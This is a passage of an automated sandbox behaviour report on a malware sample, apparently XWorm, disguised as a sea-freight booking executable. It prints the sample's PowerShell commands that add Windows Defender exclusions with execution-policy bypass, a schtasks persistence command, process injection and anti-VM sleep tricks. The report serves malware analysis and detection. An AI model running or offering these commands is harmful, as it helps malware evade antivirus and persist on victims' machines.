Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5349	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5706	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 821	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Window / User API: threadDelayed 6874	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Window / User API: threadDelayed 2956	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8194
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 747
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2679
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7611
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2071
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4041

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe TID: 6756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep count: 5349 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep count: 218 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe TID: 7496	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe TID: 7704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep count: 8194 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep count: 747 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe TID: 8032	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep count: 7015 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep count: 2679 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 7611 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 2071 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep count: 5762 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep count: 4041 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\XClient.exe TID: 7784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\XClient.exe TID: 2832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\XClient.exe TID: 7652	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\XClient.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477

Source: XClient.exe, 00000020.00000002.2296750586.0000000006DC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\B
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4190479980.0000000000F71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory written: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory written: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\XClient.exe	Memory written: C:\Users\user\AppData\Local\XClient.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\XClient.exe	Memory written: C:\Users\user\AppData\Local\XClient.exe base: 400000 value starts with: 4D5A

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp378C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp5296.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmpDDBF.tmp"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp125.tmp"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-^q
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q\|e

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
